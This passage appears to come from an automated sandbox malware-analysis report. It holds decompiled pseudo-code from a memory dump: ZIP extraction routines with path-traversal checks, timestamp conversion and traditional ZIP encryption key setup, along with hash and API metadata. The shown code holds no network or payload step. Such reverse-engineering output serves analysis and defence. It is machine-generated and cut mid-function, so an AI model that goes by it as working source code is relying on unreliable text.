                                                                    								if(__eflags == 0) {
                                                                    									_t177 = E0041D05B(_t262, _t313, 0x104, 0, __eflags, _v576);
                                                                    									_t337 =  *( *_v568);
                                                                    									_v572 = _t177;
                                                                    									_t178 = E00406A22( *( *_v568), _t177, 1, _v576);
                                                                    									__eflags = _t178 - _v576;
                                                                    									if(_t178 == _v576) {
                                                                    										 *_t262 =  *( *_v568 + 0x10);
                                                                    										_t182 = 0;
                                                                    										__eflags = 0;
                                                                    										do {
                                                                    											_t271 =  *((intOrPtr*)(_t347 + _t182 - 0x114));
                                                                    											 *((char*)(_t347 + _t182 - 0x21c)) = _t271;
                                                                    											_t182 = _t182 + 1;
                                                                    											__eflags = _t271;
                                                                    										} while (_t271 != 0);
                                                                    										_t338 =  &_v544;
                                                                    										while(1) {
                                                                    											_t183 =  *_t338;
                                                                    											__eflags = _t183;
                                                                    											if(_t183 == 0) {
                                                                    												break;
                                                                    											}
                                                                    											L24:
                                                                    											__eflags =  *((char*)(_t338 + 1)) - 0x3a;
                                                                    											if( *((char*)(_t338 + 1)) != 0x3a) {
                                                                    												goto L26;
                                                                    											}
                                                                    											_t338 = _t338 + 2;
                                                                    											while(1) {
                                                                    												_t183 =  *_t338;
                                                                    												__eflags = _t183;
                                                                    												if(_t183 == 0) {
                                                                    													break;
                                                                    												}
                                                                    												goto L24;
                                                                    											}
                                                                    											L26:
                                                                    											__eflags = _t183 - 0x5c;
                                                                    											if(_t183 == 0x5c) {
                                                                    												L28:
                                                                    												_t338 = _t338 + 1;
                                                                    												while(1) {
                                                                    													_t183 =  *_t338;
                                                                    													__eflags = _t183;
                                                                    													if(_t183 == 0) {
                                                                    														break;
                                                                    													}
                                                                    													goto L24;
                                                                    												}
                                                                    												goto L26;
                                                                    											}
                                                                    											__eflags = _t183 - 0x2f;
                                                                    											if(_t183 != 0x2f) {
                                                                    												_t184 = E0041E5AB(_t338, "\\..\\");
                                                                    												__eflags = _t184;
                                                                    												if(_t184 != 0) {
                                                                    													L33:
                                                                    													_t50 = _t184 + 4; // 0x4
                                                                    													_t338 = _t50;
                                                                    													continue;
                                                                    												}
                                                                    												_t184 = E0041E5AB(_t338, "\\../");
                                                                    												__eflags = _t184;
                                                                    												if(_t184 != 0) {
                                                                    													goto L33;
                                                                    												}
                                                                    												_t184 = E0041E5AB(_t338, "/../");
                                                                    												__eflags = _t184;
                                                                    												if(_t184 != 0) {
                                                                    													goto L33;
                                                                    												}
                                                                    												_t184 = E0041E5AB(_t338, "/..\\");
                                                                    												__eflags = _t184;
                                                                    												if(_t184 == 0) {
                                                                    													E0041E427(_t262 + 4, _t338, _t328);
                                                                    													_t280 = _v636;
                                                                    													_v563 = _t280 >> 0x0000001e & 0x00000001;
                                                                    													_t191 = _v688 >> 8;
                                                                    													_t317 =  !(_t280 >> 0x17) & 0x00000001;
                                                                    													_v562 = 0;
                                                                    													_v561 = 0;
                                                                    													_v564 = 1;
                                                                    													__eflags = _t191;
                                                                    													if(_t191 == 0) {
                                                                    														L38:
                                                                    														_v562 = _t280 >> 0x00000001 & 0x00000001;
                                                                    														_v561 = _t280 >> 0x00000002 & 0x00000001;
                                                                    														_t317 = _t280 & 0x00000001;
                                                                    														_t282 = _t280 >> 0x00000005 & 0x00000001;
                                                                    														__eflags = _t282;
                                                                    														_v563 = _t280 >> 0x00000004 & 0x00000001;
                                                                    														_v564 = _t282;
                                                                    														L39:
                                                                    														 *(_t262 + 0x108) =  *(_t262 + 0x108) & 0x00000000;
                                                                    														__eflags = _v563;
                                                                    														if(_v563 != 0) {
                                                                    															 *(_t262 + 0x108) = 0x10;
                                                                    														}
                                                                    														__eflags = _v564;
                                                                    														if(_v564 != 0) {
                                                                    															_t67 = _t262 + 0x108;
                                                                    															 *_t67 =  *(_t262 + 0x108) | 0x00000020;
                                                                    															__eflags =  *_t67;
                                                                    														}
                                                                    														__eflags = _v562;
                                                                    														if(_v562 != 0) {
                                                                    															_t70 = _t262 + 0x108;
                                                                    															 *_t70 =  *(_t262 + 0x108) | 0x00000002;
                                                                    															__eflags =  *_t70;
                                                                    														}
                                                                    														__eflags = _t317;
                                                                    														if(_t317 != 0) {
                                                                    															_t72 = _t262 + 0x108;
                                                                    															 *_t72 =  *(_t262 + 0x108) | 0x00000001;
                                                                    															__eflags =  *_t72;
                                                                    														}
                                                                    														__eflags = _v561;
                                                                    														if(_v561 != 0) {
                                                                    															_t75 = _t262 + 0x108;
                                                                    															 *_t75 =  *(_t262 + 0x108) | 0x00000004;
                                                                    															__eflags =  *_t75;
                                                                    														}
                                                                    														 *((intOrPtr*)(_t262 + 0x124)) = _v664;
                                                                    														 *((intOrPtr*)(_t262 + 0x128)) = _v660;
                                                                    														_t203 = _v672;
                                                                    														_t284 = _t203 >> 0x10;
                                                                    														_v560.wYear = (_t284 >> 9) + 0x7bc;
                                                                    														_v560.wDay = _t284 & 0x0000001f;
                                                                    														_v560.wHour = _t203 >> 0xb;
                                                                    														_v560.wSecond = (_t203 & 0x0000001f) + (_t203 & 0x0000001f);
                                                                    														_v560.wMilliseconds = 0;
                                                                    														_v560.wMonth = _t284 >> 0x00000005 & 0x0000000f;
                                                                    														_v560.wMinute = _t203 >> 0x00000005 & 0x0000003f;
                                                                    														SystemTimeToFileTime( &_v560,  &_v584);
                                                                    														_v604.dwLowDateTime = _v584.dwLowDateTime;
                                                                    														_v604.dwHighDateTime = _v584.dwHighDateTime;
                                                                    														LocalFileTimeToFileTime( &_v604,  &_v596);
                                                                    														_t215 = _v596.dwLowDateTime;
                                                                    														_t291 = _v596.dwHighDateTime;
                                                                    														_t313 = 0;
                                                                    														__eflags = _v576 - 4;
                                                                    														 *(_t262 + 0x10c) = _t215;
                                                                    														 *(_t262 + 0x110) = _t291;
                                                                    														 *(_t262 + 0x114) = _t215;
                                                                    														 *(_t262 + 0x118) = _t291;
                                                                    														 *(_t262 + 0x11c) = _t215;
                                                                    														 *(_t262 + 0x120) = _t291;
                                                                    														if(_v576 <= 4) {
                                                                    															L61:
                                                                    															__eflags = _v572;
                                                                    															if(_v572 != 0) {
                                                                    																_push(_v572);
                                                                    																E0041E5C2();
                                                                    															}
                                                                    															_t292 = 0x4b;
                                                                    															_t337 = _t262;
                                                                    															_t217 = memcpy(_v568 + 8, _t337, _t292 << 2);
                                                                    															_t328 = _t337 + _t292 + _t292;
                                                                    															 *(_v568 + 0x134) = _t217;
                                                                    															goto L7;
                                                                    														} else {
                                                                    															_v586 = 0;
                                                                    															while(1) {
                                                                    																_t340 = _v572;
                                                                    																_v588 =  *((intOrPtr*)(_t313 + _t340));
                                                                    																_v587 =  *((intOrPtr*)(_t340 + _t313 + 1));
                                                                    																_push(3);
                                                                    																__eflags = 0;
                                                                    																asm("repe cmpsb");
                                                                    																if(0 == 0) {
                                                                    																	break;
                                                                    																}
                                                                    																_t119 = ( *(_t313 + _v572 + 2) & 0x000000ff) + 4; // 0x4
                                                                    																_t250 = _t313 + _t119;
                                                                    																_v584.dwHighDateTime = _t250;
                                                                    																__eflags = _t250 + 4 - _v576;
                                                                    																if(_t250 + 4 < _v576) {
                                                                    																	_t313 = _v584.dwHighDateTime;
                                                                    																	continue;
                                                                    																}
                                                                    																goto L61;
                                                                    															}
                                                                    															_t342 = _v572;
                                                                    															_t222 =  *(_t313 + _t342 + 4) & 0x000000ff;
                                                                    															_v561 = _t222 >> 0x00000001 & 0x00000001;
                                                                    															_t313 = _t313 + 5;
                                                                    															_v562 = _t222 >> 0x00000002 & 0x00000001;
                                                                    															__eflags = _t222 & 0x00000001;
                                                                    															if((_t222 & 0x00000001) != 0) {
                                                                    																_t307 = _t313 + _t342;
                                                                    																_t327 = _t313 + 4;
                                                                    																__eflags = ((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t307 & 0x000000ff;
                                                                    																_v584.dwHighDateTime = _t327;
                                                                    																_t247 = E004049F0(((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t307 & 0x000000ff, _t327);
                                                                    																 *(_t262 + 0x120) = _t327;
                                                                    																_t313 = _v584.dwHighDateTime;
                                                                    																 *(_t262 + 0x11c) = _t247;
                                                                    															}
                                                                    															__eflags = _v561;
                                                                    															if(_v561 != 0) {
                                                                    																_t305 = _t313 + _t342;
                                                                    																_t326 = _t313 + 4;
                                                                    																__eflags = ((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t305 & 0x000000ff;
                                                                    																_v584.dwHighDateTime = _t326;
                                                                    																_t239 = E004049F0(((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t305 & 0x000000ff, _t326);
                                                                    																 *(_t262 + 0x110) = _t326;
                                                                    																_t313 = _v584.dwHighDateTime;
                                                                    																 *(_t262 + 0x10c) = _t239;
                                                                    															}
                                                                    															__eflags = _v562;
                                                                    															if(_v562 != 0) {
                                                                    																_t303 = _t313 + _v572;
                                                                    																_t313 = _t303[1] & 0x000000ff;
                                                                    																__eflags = (((_t303[3] & 0x000000ff) << 0x00000008 | _t303[2] & 0x000000ff) << 0x00000008 | _t313) << 0x00000008 |  *_t303 & 0x000000ff;
                                                                    																 *(_t262 + 0x114) = E004049F0((((_t303[3] & 0x000000ff) << 0x00000008 | _t303[2] & 0x000000ff) << 0x00000008 | _t313) << 0x00000008 |  *_t303 & 0x000000ff, _t313);
                                                                    																 *(_t262 + 0x118) = _t313;
                                                                    															}
                                                                    															goto L61;
                                                                    														}
                                                                    													}
                                                                    													__eflags = _t191 - 7;
                                                                    													if(_t191 == 7) {
                                                                    														goto L38;
                                                                    													}
                                                                    													__eflags = _t191 - 0xb;
                                                                    													if(_t191 == 0xb) {
                                                                    														goto L38;
                                                                    													}
                                                                    													__eflags = _t191 - 0xe;
                                                                    													if(_t191 != 0xe) {
                                                                    														goto L39;
                                                                    													}
                                                                    													goto L38;
                                                                    												}
                                                                    												goto L33;
                                                                    											}
                                                                    											goto L28;
                                                                    										}
                                                                    									}
                                                                    									_push(_v572);
                                                                    									E0041E5C2();
                                                                    								}
                                                                    								_t165 = 0x800;
                                                                    								goto L65;
                                                                    							}
                                                                    							_t165 = 0x700;
                                                                    							goto L65;
                                                                    						} else {
                                                                    							do {
                                                                    								E0040706A( *_t337);
                                                                    								_t255 =  *_v568;
                                                                    								_t337 = _v568;
                                                                    								__eflags =  *((intOrPtr*)(_t255 + 0x10)) - _a4;
                                                                    							} while ( *((intOrPtr*)(_t255 + 0x10)) < _a4);
                                                                    							goto L14;
                                                                    						}
                                                                    					}
                                                                    					goto L9;
                                                                    				} else {
                                                                    					if(_t164 == 0xffffffff) {
                                                                    						L9:
                                                                    						 *_t262 =  *( *_t337 + 4);
                                                                    						 *((char*)(_t262 + 4)) = 0;
                                                                    						 *(_t262 + 0x108) = 0;
                                                                    						 *(_t262 + 0x10c) = 0;
                                                                    						 *(_t262 + 0x110) = 0;
                                                                    						 *(_t262 + 0x114) = 0;
                                                                    						 *(_t262 + 0x118) = 0;
                                                                    						 *(_t262 + 0x11c) = 0;
                                                                    						 *(_t262 + 0x120) = 0;
                                                                    						 *((intOrPtr*)(_t262 + 0x124)) = 0;
                                                                    						 *((intOrPtr*)(_t262 + 0x128)) = 0;
                                                                    						L7:
                                                                    						_t165 = 0;
                                                                    						goto L65;
                                                                    					}
                                                                    					_t337 = _t337 + 8;
                                                                    					_t311 = 0x4b;
                                                                    					memcpy(_t262, _t337, _t311 << 2);
                                                                    					_t328 = _t337 + _t311 + _t311;
                                                                    					goto L7;
                                                                    				}
                                                                    			}
                                                                    0x00407c51
                                                                    0x00407c5f
                                                                    0x00407c61
                                                                    0x00407c63
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407c70
                                                                    0x00407c70
                                                                    0x00407c74
                                                                    0x00407c7d
                                                                    0x00407c83
                                                                    0x00407c32
                                                                    0x00000000
                                                                    0x00407c32
                                                                    0x00000000
                                                                    0x00407c85
                                                                    0x00407c8a
                                                                    0x00407c90
                                                                    0x00407c9c
                                                                    0x00407caa
                                                                    0x00407cad
                                                                    0x00407cb3
                                                                    0x00407cb5
                                                                    0x00407cb7
                                                                    0x00407cd6
                                                                    0x00407cd9
                                                                    0x00407cdb
                                                                    0x00407ce1
                                                                    0x00407ce6
                                                                    0x00407cec
                                                                    0x00407cf2
                                                                    0x00407cf2
                                                                    0x00407cf8
                                                                    0x00407cff
                                                                    0x00407d01
                                                                    0x00407d20
                                                                    0x00407d23
                                                                    0x00407d25
                                                                    0x00407d2b
                                                                    0x00407d30
                                                                    0x00407d36
                                                                    0x00407d3c
                                                                    0x00407d3c
                                                                    0x00407d42
                                                                    0x00407d49
                                                                    0x00407d51
                                                                    0x00407d61
                                                                    0x00407d70
                                                                    0x00407d77
                                                                    0x00407d7d
                                                                    0x00407d7d
                                                                    0x00000000
                                                                    0x00407d49
                                                                    0x00407c24
                                                                    0x00407a8c
                                                                    0x00407a8f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a91
                                                                    0x00407a94
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a96
                                                                    0x00407a99
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407a99
                                                                    0x00000000
                                                                    0x00407a38
                                                                    0x00000000
                                                                    0x004079f1
                                                                    0x004079da
                                                                    0x004079a4
                                                                    0x004079aa
                                                                    0x004079af
                                                                    0x00407965
                                                                    0x00000000
                                                                    0x00407965
                                                                    0x00407946
                                                                    0x00000000
                                                                    0x004078e6
                                                                    0x004078e6
                                                                    0x004078e8
                                                                    0x004078f3
                                                                    0x004078f8
                                                                    0x004078fe
                                                                    0x004078fe
                                                                    0x00000000
                                                                    0x004078e6
                                                                    0x004078e4
                                                                    0x00000000
                                                                    0x00407868
                                                                    0x0040786b
                                                                    0x00407883
                                                                    0x00407888
                                                                    0x0040788c
                                                                    0x00407890
                                                                    0x00407896
                                                                    0x0040789c
                                                                    0x004078a2
                                                                    0x004078a8
                                                                    0x004078ae
                                                                    0x004078b4
                                                                    0x004078ba
                                                                    0x004078c0
                                                                    0x00407877
                                                                    0x00407877
                                                                    0x00000000
                                                                    0x00407877
                                                                    0x0040786f
                                                                    0x00407872
                                                                    0x00407875
                                                                    0x00407875
                                                                    0x00000000
                                                                    0x00407875

                                                                    APIs
                                                                      • Part of subcall function 004069C3: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,00406B79), ref: 004069EF
                                                                    • __fassign.LIBCMT ref: 00407A45
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407BB9
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00407BE5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileTime$LocalPointerSystem__fassign
                                                                    • String ID: $/../$/..\$\../$\..\
                                                                    • API String ID: 3768451866-3209527955
                                                                    • Opcode ID: df8644b29a54a3a5d05e555ff76b3b4d9f9a9ba968dbc30f1fc888c12a42ab35
                                                                    • Instruction ID: b54f6115b32606d987e95d6d0f6a79dacc0784b1bcc0f9f6c932516286150cc1
                                                                    • Opcode Fuzzy Hash: df8644b29a54a3a5d05e555ff76b3b4d9f9a9ba968dbc30f1fc888c12a42ab35
                                                                    • Instruction Fuzzy Hash: 6CF19271D082548BDB24DF28C8897D97BB0AF59304F1445FAE849AB382D739AE81CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E0041C6DE(signed int __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				signed int _v12;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				char _v25;
                                                                    				char _v26;
                                                                    				char _v27;
                                                                    				char _v28;
                                                                    				char _v32;
                                                                    				char _v42;
                                                                    				char _v44;
                                                                    				char _v45;
                                                                    				char _v56;
                                                                    				char _v320;
                                                                    				signed int _v324;
                                                                    				signed int _v328;
                                                                    				char _v336;
                                                                    				char _v596;
                                                                    				char _v856;
                                                                    				signed int _v860;
                                                                    				char* _v864;
                                                                    				char* _v868;
                                                                    				signed int _v1128;
                                                                    				intOrPtr _v1132;
                                                                    				intOrPtr _v1136;
                                                                    				short _v1140;
                                                                    				short _v1142;
                                                                    				short _v1144;
                                                                    				signed int _v1148;
                                                                    				intOrPtr _v1152;
                                                                    				intOrPtr _v1156;
                                                                    				char _v1160;
                                                                    				signed int _v1164;
                                                                    				signed int _v1168;
                                                                    				signed int _v1172;
                                                                    				unsigned int _v1176;
                                                                    				void* _v1178;
                                                                    				signed int _v1180;
                                                                    				short _v1182;
                                                                    				char _v1184;
                                                                    				signed int _v1185;
                                                                    				char _v1186;
                                                                    				signed int _v1192;
                                                                    				void* _v1196;
                                                                    				signed int _v1200;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t223;
                                                                    				intOrPtr* _t225;
                                                                    				char* _t228;
                                                                    				intOrPtr _t229;
                                                                    				intOrPtr* _t230;
                                                                    				short _t234;
                                                                    				signed int _t236;
                                                                    				signed int _t238;
                                                                    				signed int _t247;
                                                                    				signed int _t250;
                                                                    				signed int _t253;
                                                                    				signed int _t255;
                                                                    				signed char _t263;
                                                                    				char _t264;
                                                                    				intOrPtr _t267;
                                                                    				signed int _t269;
                                                                    				void* _t273;
                                                                    				void* _t274;
                                                                    				signed int _t277;
                                                                    				signed int _t278;
                                                                    				signed int _t280;
                                                                    				signed int _t283;
                                                                    				signed int _t288;
                                                                    				signed int _t294;
                                                                    				signed int _t297;
                                                                    				signed int _t298;
                                                                    				intOrPtr* _t299;
                                                                    				void* _t300;
                                                                    				void* _t301;
                                                                    				signed int _t303;
                                                                    				signed int _t306;
                                                                    				signed int _t307;
                                                                    				signed int _t308;
                                                                    				signed int _t331;
                                                                    				signed int _t332;
                                                                    				signed int* _t337;
                                                                    				signed int _t340;
                                                                    				void* _t343;
                                                                    				signed int _t355;
                                                                    				void* _t358;
                                                                    				signed int _t362;
                                                                    				signed int _t364;
                                                                    				signed int _t365;
                                                                    				signed int _t366;
                                                                    				signed int _t369;
                                                                    				void* _t370;
                                                                    				signed char* _t371;
                                                                    				intOrPtr _t373;
                                                                    				signed int _t379;
                                                                    
                                                                    				_t341 = __edx;
                                                                    				_t223 =  *0x443674; // 0x393162b1
                                                                    				_v12 = _t223 ^ _t379;
                                                                    				_t225 = _a4;
                                                                    				_t301 = __edx;
                                                                    				_t363 = 0;
                                                                    				_v1192 = __ecx;
                                                                    				if( *((intOrPtr*)(__edx + 0x14)) == 0) {
                                                                    					__eflags =  *((char*)(__edx + 0x2c));
                                                                    					if( *((char*)(__edx + 0x2c)) == 0) {
                                                                    						_v1200 = 0;
                                                                    						__eflags =  *__edx;
                                                                    						if( *__edx != 0) {
                                                                    							__eflags = _a12 - 4;
                                                                    							if(_a12 != 4) {
                                                                    								_v1200 = 0xc;
                                                                    							}
                                                                    						}
                                                                    						_t341 =  &_v320 - _t225;
                                                                    						__eflags = _t341;
                                                                    						do {
                                                                    							_t303 =  *_t225;
                                                                    							 *((char*)(_t341 + _t225)) = _t303;
                                                                    							_t225 = _t225 + 1;
                                                                    							__eflags = _t303;
                                                                    						} while (_t303 != 0);
                                                                    						__eflags = _v320 - _t303;
                                                                    						if(_v320 == _t303) {
                                                                    							L99:
                                                                    							_t226 = 0x10000;
                                                                    							goto L100;
                                                                    						}
                                                                    						_t228 =  &_v320;
                                                                    						do {
                                                                    							__eflags =  *_t228 - 0x5c;
                                                                    							if( *_t228 == 0x5c) {
                                                                    								 *_t228 = 0x2f;
                                                                    							}
                                                                    							_t228 = _t228 + 1;
                                                                    							__eflags =  *_t228;
                                                                    						} while ( *_t228 != 0);
                                                                    						__eflags = _a12 - 4;
                                                                    						_v1185 = _a12 == 4;
                                                                    						__eflags = _v1185;
                                                                    						if(_v1185 == 0) {
                                                                    							L18:
                                                                    							_v1186 = 0;
                                                                    							L19:
                                                                    							__eflags = _v1185;
                                                                    							_v1196 = 8;
                                                                    							if(_v1185 != 0) {
                                                                    								L21:
                                                                    								_v1196 = _t363;
                                                                    								L22:
                                                                    								_t229 = _a12;
                                                                    								__eflags = _t229 - 2;
                                                                    								if(_t229 != 2) {
                                                                    									__eflags = _t229 - 1;
                                                                    									if(_t229 != 1) {
                                                                    										__eflags = _t229 - 3;
                                                                    										if(_t229 != 3) {
                                                                    											__eflags = _t229 - 4;
                                                                    											if(__eflags != 0) {
                                                                    												goto L99;
                                                                    											}
                                                                    											_t226 = E0041C401(_t301, _t341, __eflags);
                                                                    											L30:
                                                                    											__eflags = _t226;
                                                                    											if(_t226 != 0) {
                                                                    												goto L100;
                                                                    											}
                                                                    											_t32 =  &_v324;
                                                                    											 *_t32 = _v324 & _t226;
                                                                    											__eflags =  *_t32;
                                                                    											_v1128 = _t226;
                                                                    											do {
                                                                    												_t306 =  *((intOrPtr*)(_t379 + _t226 - 0x13c));
                                                                    												 *((char*)(_t379 + _t226 - 0x354)) = _t306;
                                                                    												_t226 = _t226 + 1;
                                                                    												__eflags = _t306;
                                                                    											} while (_t306 != 0);
                                                                    											_t230 =  &_v856;
                                                                    											_t343 = _t230 + 1;
                                                                    											do {
                                                                    												_t307 =  *_t230;
                                                                    												_t230 = _t230 + 1;
                                                                    												__eflags = _t307;
                                                                    											} while (_t307 != 0);
                                                                    											_v1160 = _t230 - _t343;
                                                                    											__eflags = _v1186 - _t307;
                                                                    											if(_v1186 == _t307) {
                                                                    												L39:
                                                                    												_v1142 = 0;
                                                                    												_v1184 = 0xb17;
                                                                    												_t234 = 0x14;
                                                                    												_v1182 = _t234;
                                                                    												_v1176 =  *((intOrPtr*)(_t301 + 0x68));
                                                                    												_t236 = 8;
                                                                    												_v596 = 0;
                                                                    												_v860 = 0;
                                                                    												_v1148 = 0;
                                                                    												_v336 = 1;
                                                                    												_v328 = 0;
                                                                    												_v1172 = 0;
                                                                    												_v1180 = _t236;
                                                                    												_t308 = 9;
                                                                    												__eflags =  *_t301;
                                                                    												if( *_t301 != 0) {
                                                                    													__eflags = _v1185;
                                                                    													if(_v1185 == 0) {
                                                                    														_v1180 = _t308;
                                                                    													}
                                                                    												}
                                                                    												_v1140 = _v1180;
                                                                    												_t238 = _v1196;
                                                                    												_v1178 = _t238;
                                                                    												__eflags = _t238;
                                                                    												if(_t238 != 0) {
                                                                    													L45:
                                                                    													_v1168 = 0;
                                                                    													goto L46;
                                                                    												} else {
                                                                    													_t294 =  *(_t301 + 0x70);
                                                                    													__eflags = _t294;
                                                                    													if(_t294 < 0) {
                                                                    														goto L45;
                                                                    													}
                                                                    													_v1168 = _t294 + _v1200;
                                                                    													L46:
                                                                    													_v1164 =  *(_t301 + 0x70);
                                                                    													_t364 =  *(_t301 + 0x58);
                                                                    													_v1144 = 0;
                                                                    													_v1136 =  *((intOrPtr*)(_t301 + 0x4c));
                                                                    													_v1152 = _t308;
                                                                    													_v1132 =  *(_t301 + 0x18) +  *((intOrPtr*)(_t301 + 0x10));
                                                                    													_v868 =  &_v32;
                                                                    													_v864 =  &_v44;
                                                                    													_v27 =  *(_t301 + 0x58);
                                                                    													_t247 =  *(_t301 + 0x5c);
                                                                    													_v26 = (_t247 << 0x00000020 | _t364) >> 8;
                                                                    													_v25 = (_t247 << 0x00000020 | _t364) >> 0x10;
                                                                    													_t365 =  *(_t301 + 0x50);
                                                                    													_v24 = (_t247 << 0x00000020 | _t364) >> 0x18;
                                                                    													_v23 =  *(_t301 + 0x50);
                                                                    													_t250 =  *(_t301 + 0x54);
                                                                    													_v22 = (_t250 << 0x00000020 | _t365) >> 8;
                                                                    													_v21 = (_t250 << 0x00000020 | _t365) >> 0x10;
                                                                    													_t366 =  *(_t301 + 0x60);
                                                                    													_v20 = (_t250 << 0x00000020 | _t365) >> 0x18;
                                                                    													_v19 =  *(_t301 + 0x60);
                                                                    													_t253 =  *(_t301 + 0x64);
                                                                    													_v18 = (_t253 << 0x00000020 | _t366) >> 8;
                                                                    													_t355 = _t253;
                                                                    													_v17 = (_t355 << 0x00000020 | _t366) >> 0x10;
                                                                    													_v32 = 0xd5455;
                                                                    													_v28 = 7;
                                                                    													_v16 = (_t253 << 0x00000020 | _t366) >> 0x18;
                                                                    													asm("movsd");
                                                                    													asm("movsd");
                                                                    													asm("movsb");
                                                                    													_t356 = _t301;
                                                                    													_v1156 = 0x11;
                                                                    													_t341 = _t355 >> 0x10;
                                                                    													_v42 = 5;
                                                                    													_t255 = E0041B274(_t301, (_t253 << 0x00000020 | _t366) >> 0x18, _t301,  &_v1184);
                                                                    													__eflags = _t255;
                                                                    													if(_t255 == 0) {
                                                                    														 *(_t301 + 0x18) =  *(_t301 + 0x18) + _v1156 + _v1160 + 0x1e;
                                                                    														__eflags =  *(_t301 + 0x14);
                                                                    														if( *(_t301 + 0x14) == 0) {
                                                                    															_t369 =  *_t301;
                                                                    															_t328 = _t301 + 0x30;
                                                                    															 *((intOrPtr*)(_t301 + 0x30)) = 0x12345678;
                                                                    															 *((intOrPtr*)(_t301 + 0x34)) = 0x23456789;
                                                                    															 *((intOrPtr*)(_t301 + 0x38)) = 0x34567890;
                                                                    															__eflags = _t369;
                                                                    															if(_t369 == 0) {
                                                                    																L54:
                                                                    																__eflags =  *0x446718;
                                                                    																if( *0x446718 == 0) {
                                                                    																	_t288 = GetDesktopWindow();
                                                                    																	__eflags = _t288 ^ GetTickCount();
                                                                    																	E0041FD60(_t288 ^ GetTickCount());
                                                                    																}
                                                                    																_t370 = 0;
                                                                    																__eflags = 0;
                                                                    																do {
                                                                    																	 *((char*)(_t379 + _t370 - 0x34)) = E0041FD72(__eflags) >> 7;
                                                                    																	_t370 = _t370 + 1;
                                                                    																	__eflags = _t370 - 0xc;
                                                                    																} while (__eflags < 0);
                                                                    																_v45 = _v1176 >> 8;
                                                                    																_t358 = 0;
                                                                    																__eflags = 0;
                                                                    																do {
                                                                    																	_t371 = _t379 + _t358 - 0x34;
                                                                    																	_t263 = E0041BC56(_t301 + 0x30, __eflags,  *_t371 & 0x000000ff);
                                                                    																	_t358 = _t358 + 1;
                                                                    																	_pop(_t330);
                                                                    																	 *_t371 = _t263;
                                                                    																	__eflags = _t358 - 0xc;
                                                                    																} while (__eflags < 0);
                                                                    																__eflags =  *_t301;
                                                                    																if( *_t301 != 0) {
                                                                    																	__eflags = _v1185;
                                                                    																	if(_v1185 == 0) {
                                                                    																		_t330 = _t301;
                                                                    																		E0041C02B(_t301,  &_v56, 0xc);
                                                                    																		_t166 = _t301 + 0x18;
                                                                    																		 *_t166 =  *(_t301 + 0x18) + 0xc;
                                                                    																		__eflags =  *_t166;
                                                                    																	}
                                                                    																}
                                                                    																_v1192 = 0;
                                                                    																__eflags =  *_t301;
                                                                    																if( *_t301 == 0) {
                                                                    																	L66:
                                                                    																	_t264 = 0;
                                                                    																	__eflags = 0;
                                                                    																	goto L67;
                                                                    																} else {
                                                                    																	__eflags = _v1185;
                                                                    																	if(_v1185 != 0) {
                                                                    																		goto L66;
                                                                    																	}
                                                                    																	_t264 = 1;
                                                                    																	L67:
                                                                    																	__eflags = _v1185;
                                                                    																	_t356 = _v1196;
                                                                    																	 *((char*)(_t301 + 0x2d)) = _t264;
                                                                    																	if(_v1185 != 0) {
                                                                    																		 *(_t301 + 0x90) = 0;
                                                                    																		L74:
                                                                    																		_t363 = _t301;
                                                                    																		 *((char*)(_t301 + 0x2d)) = 0;
                                                                    																		E0041C540(_t301);
                                                                    																		_t331 =  *(_t301 + 0x90);
                                                                    																		_t226 =  *(_t301 + 0x14);
                                                                    																		 *(_t301 + 0x18) =  *(_t301 + 0x18) + _t331;
                                                                    																		__eflags = _t226;
                                                                    																		if(_t226 != 0) {
                                                                    																			goto L100;
                                                                    																		}
                                                                    																		__eflags = _v1192 - _t226;
                                                                    																		if(_v1192 != _t226) {
                                                                    																			L48:
                                                                    																			_t226 = 0x400;
                                                                    																			goto L100;
                                                                    																		}
                                                                    																		_t341 =  *(_t301 + 0x78);
                                                                    																		_t267 = _v1200 + _t331;
                                                                    																		__eflags = _v1168 - _t267;
                                                                    																		_v1168 = _t267;
                                                                    																		_t332 = _t331 & 0xffffff00 | _v1168 == _t267;
                                                                    																		__eflags =  *((char*)(_t301 + 0x1c));
                                                                    																		_v1172 =  *(_t301 + 0x78);
                                                                    																		_v1164 =  *(_t301 + 0x70);
                                                                    																		if( *((char*)(_t301 + 0x1c)) == 0) {
                                                                    																			L86:
                                                                    																			__eflags = _v1178 - _t356;
                                                                    																			if(_v1178 == _t356) {
                                                                    																				__eflags = _t356;
                                                                    																				if(_t356 != 0) {
                                                                    																					L90:
                                                                    																					_t356 = _t301;
                                                                    																					_t363 =  &_v1184;
                                                                    																					_t269 = E0041B4D6(_t332, _t301,  &_v1184);
                                                                    																					__eflags = _t269;
                                                                    																					if(_t269 != 0) {
